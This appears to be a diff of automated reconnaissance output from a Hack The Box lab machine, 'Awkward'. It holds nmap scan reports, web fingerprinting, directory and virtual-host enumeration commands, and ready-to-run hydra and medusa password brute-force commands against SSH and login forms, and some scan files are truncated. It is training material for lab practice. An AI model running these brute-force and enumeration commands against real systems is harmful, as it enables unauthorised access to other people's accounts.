medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/awkward/results/awkward.htb/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h awkward.htb
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://awkward.htb:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://awkward.htb/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h awkward.htb -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://awkward.htb/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h awkward.htb -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://awkward.htb:80 2>&1 | tee "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://awkward.htb:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_wpscan.txt"


@@ -0,0 +1 @@
# Nmap 7.93 scan initiated Tue Feb 7 23:18:35 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/htb/awkward/results/awkward.htb/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/xml/_quick_tcp_nmap.xml awkward.htb


@@ -0,0 +1 @@
# Nmap 7.93 scan initiated Tue Feb 7 23:18:35 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/kali/htb/awkward/results/awkward.htb/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/xml/_top_100_udp_nmap.xml awkward.htb


@@ -0,0 +1,60 @@
# Nmap 7.93 scan initiated Tue Feb 7 23:18:03 2023 as: nmap -vv --reason -Pn -T4 -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/awkward/results/awkward.htb/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/tcp22/xml/tcp_22_ssh_nmap.xml awkward.htb
Nmap scan report for awkward.htb (10.10.11.185)
Host is up, received user-set (0.038s latency).
Scanned at 2023-02-07 23:18:03 CET for 2s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
|_banner: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3
| ssh2-enum-algos:
| kex_algorithms: (10)
| curve25519-sha256
| curve25519-sha256@libssh.org
| ecdh-sha2-nistp256
| ecdh-sha2-nistp384
| ecdh-sha2-nistp521
| sntrup761x25519-sha512@openssh.com
| diffie-hellman-group-exchange-sha256
| diffie-hellman-group16-sha512
| diffie-hellman-group18-sha512
| diffie-hellman-group14-sha256
| server_host_key_algorithms: (4)
| rsa-sha2-512
| rsa-sha2-256
| ecdsa-sha2-nistp256
| ssh-ed25519
| encryption_algorithms: (6)
| chacha20-poly1305@openssh.com
| aes128-ctr
| aes192-ctr
| aes256-ctr
| aes128-gcm@openssh.com
| aes256-gcm@openssh.com
| mac_algorithms: (10)
| umac-64-etm@openssh.com
| umac-128-etm@openssh.com
| hmac-sha2-256-etm@openssh.com
| hmac-sha2-512-etm@openssh.com
| hmac-sha1-etm@openssh.com
| umac-64@openssh.com
| umac-128@openssh.com
| hmac-sha2-256
| hmac-sha2-512
| hmac-sha1
| compression_algorithms: (2)
| none
|_ zlib@openssh.com
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
| ssh-hostkey:
| 256 7254afbaf6e2835941b7cd611c2f418b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCMaN1wQtPg5uk2w3xD0d0ND6JQgzw40PoqCSBDGB7Q0/f5lQSGU2eSTw4uCdL99hdM/+Uv84ffp2tNkCXyV8l8=
| 256 59365bba3c7821e326b37d23605aec38 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFsq9sSC1uhq5CBWylh+yiC7jz4tuegMj/4FVTp6bzZy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 7 23:18:05 2023 -- 1 IP address (1 host up) scanned in 1.63 seconds


@@ -0,0 +1,95 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Feb 7 23:18:03 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/awkward/results/awkward.htb/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/tcp22/xml/tcp_22_ssh_nmap.xml awkward.htb -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/awkward/results/awkward.htb/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/tcp22/xml/tcp_22_ssh_nmap.xml awkward.htb" start="1675808283" startstr="Tue Feb 7 23:18:03 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1" services="22"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675808283"/>
<taskend task="NSE" time="1675808283"/>
<taskbegin task="NSE" time="1675808283"/>
<taskend task="NSE" time="1675808283"/>
<taskbegin task="SYN Stealth Scan" time="1675808283"/>
<taskend task="SYN Stealth Scan" time="1675808283" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1675808284"/>
<taskend task="Service scan" time="1675808284" extrainfo="1 service on 1 host"/>
<taskbegin task="NSE" time="1675808284"/>
<taskend task="NSE" time="1675808285"/>
<taskbegin task="NSE" time="1675808285"/>
<taskend task="NSE" time="1675808285"/>
<host starttime="1675808283" endtime="1675808285"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.185" addrtype="ipv4"/>
<hostnames>
<hostname name="awkward.htb" type="user"/>
<hostname name="awkward.htb" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="8.9p1 Ubuntu 3" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.9p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="banner" output="SSH-2.0-OpenSSH_8.9p1 Ubuntu-3"/><script id="ssh2-enum-algos" output="&#xa; kex_algorithms: (10)&#xa; curve25519-sha256&#xa; curve25519-sha256@libssh.org&#xa; ecdh-sha2-nistp256&#xa; ecdh-sha2-nistp384&#xa; ecdh-sha2-nistp521&#xa; sntrup761x25519-sha512@openssh.com&#xa; diffie-hellman-group-exchange-sha256&#xa; diffie-hellman-group16-sha512&#xa; diffie-hellman-group18-sha512&#xa; diffie-hellman-group14-sha256&#xa; server_host_key_algorithms: (4)&#xa; rsa-sha2-512&#xa; rsa-sha2-256&#xa; ecdsa-sha2-nistp256&#xa; ssh-ed25519&#xa; encryption_algorithms: (6)&#xa; chacha20-poly1305@openssh.com&#xa; aes128-ctr&#xa; aes192-ctr&#xa; aes256-ctr&#xa; aes128-gcm@openssh.com&#xa; aes256-gcm@openssh.com&#xa; mac_algorithms: (10)&#xa; umac-64-etm@openssh.com&#xa; umac-128-etm@openssh.com&#xa; hmac-sha2-256-etm@openssh.com&#xa; hmac-sha2-512-etm@openssh.com&#xa; hmac-sha1-etm@openssh.com&#xa; umac-64@openssh.com&#xa; umac-128@openssh.com&#xa; hmac-sha2-256&#xa; hmac-sha2-512&#xa; hmac-sha1&#xa; compression_algorithms: (2)&#xa; none&#xa; zlib@openssh.com"><table key="kex_algorithms">
<elem>curve25519-sha256</elem>
<elem>curve25519-sha256@libssh.org</elem>
<elem>ecdh-sha2-nistp256</elem>
<elem>ecdh-sha2-nistp384</elem>
<elem>ecdh-sha2-nistp521</elem>
<elem>sntrup761x25519-sha512@openssh.com</elem>
<elem>diffie-hellman-group-exchange-sha256</elem>
<elem>diffie-hellman-group16-sha512</elem>
<elem>diffie-hellman-group18-sha512</elem>
<elem>diffie-hellman-group14-sha256</elem>
</table>
<table key="server_host_key_algorithms">
<elem>rsa-sha2-512</elem>
<elem>rsa-sha2-256</elem>
<elem>ecdsa-sha2-nistp256</elem>
<elem>ssh-ed25519</elem>
</table>
<table key="encryption_algorithms">
<elem>chacha20-poly1305@openssh.com</elem>
<elem>aes128-ctr</elem>
<elem>aes192-ctr</elem>
<elem>aes256-ctr</elem>
<elem>aes128-gcm@openssh.com</elem>
<elem>aes256-gcm@openssh.com</elem>
</table>
<table key="mac_algorithms">
<elem>umac-64-etm@openssh.com</elem>
<elem>umac-128-etm@openssh.com</elem>
<elem>hmac-sha2-256-etm@openssh.com</elem>
<elem>hmac-sha2-512-etm@openssh.com</elem>
<elem>hmac-sha1-etm@openssh.com</elem>
<elem>umac-64@openssh.com</elem>
<elem>umac-128@openssh.com</elem>
<elem>hmac-sha2-256</elem>
<elem>hmac-sha2-512</elem>
<elem>hmac-sha1</elem>
</table>
<table key="compression_algorithms">
<elem>none</elem>
<elem>zlib@openssh.com</elem>
</table>
</script><script id="ssh-auth-methods" output="&#xa; Supported authentication methods: &#xa; publickey&#xa; password"><table key="Supported authentication methods">
<elem>publickey</elem>
<elem>password</elem>
</table>
</script><script id="ssh-hostkey" output="&#xa; 256 7254afbaf6e2835941b7cd611c2f418b (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCMaN1wQtPg5uk2w3xD0d0ND6JQgzw40PoqCSBDGB7Q0/f5lQSGU2eSTw4uCdL99hdM/+Uv84ffp2tNkCXyV8l8=&#xa; 256 59365bba3c7821e326b37d23605aec38 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFsq9sSC1uhq5CBWylh+yiC7jz4tuegMj/4FVTp6bzZy"><table>
<elem key="fingerprint">7254afbaf6e2835941b7cd611c2f418b</elem>
<elem key="bits">256</elem>
<elem key="type">ecdsa-sha2-nistp256</elem>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCMaN1wQtPg5uk2w3xD0d0ND6JQgzw40PoqCSBDGB7Q0/f5lQSGU2eSTw4uCdL99hdM/+Uv84ffp2tNkCXyV8l8=</elem>
</table>
<table>
<elem key="fingerprint">59365bba3c7821e326b37d23605aec38</elem>
<elem key="bits">256</elem>
<elem key="type">ssh-ed25519</elem>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIFsq9sSC1uhq5CBWylh+yiC7jz4tuegMj/4FVTp6bzZy</elem>
</table>
</script></port>
</ports>
<times srtt="38036" rttvar="38036" to="190180"/>
</host>
<taskbegin task="NSE" time="1675808285"/>
<taskend task="NSE" time="1675808285"/>
<taskbegin task="NSE" time="1675808285"/>
<taskend task="NSE" time="1675808285"/>
<runstats><finished time="1675808285" timestr="Tue Feb 7 23:18:05 2023" summary="Nmap done at Tue Feb 7 23:18:05 2023; 1 IP address (1 host up) scanned in 1.63 seconds" elapsed="1.63" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

@@ -0,0 +1,19 @@
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 07 Feb 2023 22:18:04 GMT
Content-Type: text/html
Content-Length: 132
Last-Modified: Thu, 15 Sep 2022 12:33:07 GMT
Connection: keep-alive
ETag: "63231b83-84"
Accept-Ranges: bytes
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Refresh" content="0; url='http://hat-valley.htb'" />
</head>
<body>
</body>
</html>

@@ -0,0 +1 @@
200 GET 8l 13w 132c http://awkward.htb/

@@ -0,0 +1 @@
# Nmap 7.93 scan initiated Tue Feb 7 23:18:03 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/tcp80/xml/tcp_80_http_nmap.xml awkward.htb
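Review bot: This file holds only the `# Nmap 7.93 scan initiated` banner, with no port table and no `# Nmap done` trailer, so the port 80 script scan against awkward.htb apparently never finished writing its results. Rerun it to completion or leave the file out; as committed it can be mistaken for a scan that found nothing.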

@@ -0,0 +1,47 @@
WhatWeb report for http://awkward.htb:80
Status : 200 OK
Title : <None>
IP : 10.10.11.185
Country : RESERVED, ZZ
Summary : HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], Meta-Refresh-Redirect[http://hat-valley.htb], nginx[1.18.0]
Detected Plugins:
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : nginx/1.18.0 (Ubuntu) (from server string)
[ Meta-Refresh-Redirect ]
Meta refresh tag is a deprecated URL element that can be
used to optionally wait x seconds before reloading the
current page or loading a new page. More info:
https://secure.wikimedia.org/wikipedia/en/wiki/Meta_refresh
String : http://hat-valley.htb
[ nginx ]
Nginx (Engine-X) is a free, open-source, high-performance
HTTP server and reverse proxy, as well as an IMAP/POP3
proxy server.
Version : 1.18.0
Website : http://nginx.net/
HTTP Headers:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 07 Feb 2023 22:18:06 GMT
Content-Type: text/html
Last-Modified: Thu, 15 Sep 2022 12:33:07 GMT
Transfer-Encoding: chunked
Connection: close
ETag: W/"63231b83-84"
Content-Encoding: gzip

@@ -0,0 +1,17 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Feb 7 23:18:03 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/tcp80/xml/tcp_80_http_nmap.xml awkward.htb -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/tcp80/xml/tcp_80_http_nmap.xml awkward.htb" start="1675808283" startstr="Tue Feb 7 23:18:03 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1" services="80"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675808283"/>
<taskend task="NSE" time="1675808283"/>
<taskbegin task="NSE" time="1675808283"/>
<taskend task="NSE" time="1675808283"/>
<taskbegin task="NSE" time="1675808283"/>
<taskend task="NSE" time="1675808283"/>
<taskbegin task="SYN Stealth Scan" time="1675808283"/>
<taskend task="SYN Stealth Scan" time="1675808284" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1675808284"/>
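Review bot: The XML stops at `<taskbegin task="Service scan" time="1675808284"/>` with no `<host>` element, no `<runstats>` and no closing `</nmaprun>`, so the file is not well-formed and anything that parses nmap XML will reject it. Commit the output of a completed run, or drop the partial file and keep only the text report.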

@@ -0,0 +1,15 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Feb 7 23:18:35 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/awkward/results/awkward.htb/scans/_full_tcp_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/xml/_full_tcp_nmap.xml awkward.htb -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/awkward/results/awkward.htb/scans/_full_tcp_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/xml/_full_tcp_nmap.xml awkward.htb" start="1675808315" startstr="Tue Feb 7 23:18:35 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="65535" services="1-65535"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675808315"/>
<taskend task="NSE" time="1675808315"/>
<taskbegin task="NSE" time="1675808315"/>
<taskend task="NSE" time="1675808315"/>
<taskbegin task="NSE" time="1675808315"/>
<taskend task="NSE" time="1675808315"/>
<taskbegin task="SYN Stealth Scan" time="1675808315"/>

@@ -0,0 +1,17 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Feb 7 23:18:35 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/awkward/results/awkward.htb/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/xml/_quick_tcp_nmap.xml awkward.htb -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/awkward/results/awkward.htb/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/xml/_quick_tcp_nmap.xml awkward.htb" start="1675808315" startstr="Tue Feb 7 23:18:35 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1000" services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,521
4,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675808315"/>
<taskend task="NSE" time="1675808315"/>
<taskbegin task="NSE" time="1675808315"/>
<taskend task="NSE" time="1675808315"/>
<taskbegin task="NSE" time="1675808315"/>
<taskend task="NSE" time="1675808315"/>
<taskbegin task="SYN Stealth Scan" time="1675808315"/>
<taskend task="SYN Stealth Scan" time="1675808316" extrainfo="1000 total ports"/>
<taskbegin task="Service scan" time="1675808316"/>

@@ -0,0 +1,15 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Feb 7 23:18:35 2023 as: nmap -vv -&#45;reason -Pn -T4 -sU -A -&#45;top-ports 100 -oN /home/kali/htb/awkward/results/awkward.htb/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/xml/_top_100_udp_nmap.xml awkward.htb -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sU -A -&#45;top-ports 100 -oN /home/kali/htb/awkward/results/awkward.htb/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/xml/_top_100_udp_nmap.xml awkward.htb" start="1675808315" startstr="Tue Feb 7 23:18:35 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="udp" protocol="udp" numservices="100" services="7,9,17,19,49,53,67-69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,631,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5353,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675808315"/>
<taskend task="NSE" time="1675808315"/>
<taskbegin task="NSE" time="1675808315"/>
<taskend task="NSE" time="1675808315"/>
<taskbegin task="NSE" time="1675808315"/>
<taskend task="NSE" time="1675808315"/>
<taskbegin task="UDP Scan" time="1675808315"/>

@@ -0,0 +1,16 @@
[*] ssh found on tcp/22.
[*] http found on tcp/80.
[*] ssh found on tcp/22.
[*] http found on tcp/80.

@@ -0,0 +1,55 @@
```bash
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_quick_tcp_nmap.xml" hat-valley.htb
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_full_tcp_nmap.xml" hat-valley.htb
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_top_100_udp_nmap.xml" hat-valley.htb
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp22/xml/tcp_22_ssh_nmap.xml" hat-valley.htb
feroxbuster -u http://hat-valley.htb:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://hat-valley.htb:80/.well-known/security.txt
curl -sSikf http://hat-valley.htb:80/robots.txt
curl -sSik http://hat-valley.htb:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/xml/tcp_80_http_nmap.xml" hat-valley.htb
curl -sk -o /dev/null -H "Host: EGBPgNKZlNXXTPPMQaVH.hat-valley.htb" http://hat-valley.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://hat-valley.htb:80 2>&1
wkhtmltoimage --format png http://hat-valley.htb:80/ /home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_screenshot.png
ffuf -u http://hat-valley.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.hat-valley.htb" -fs 132 -noninteractive -s | tee "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_hat-valley.htb_vhosts_subdomains-top1million-110000.txt"
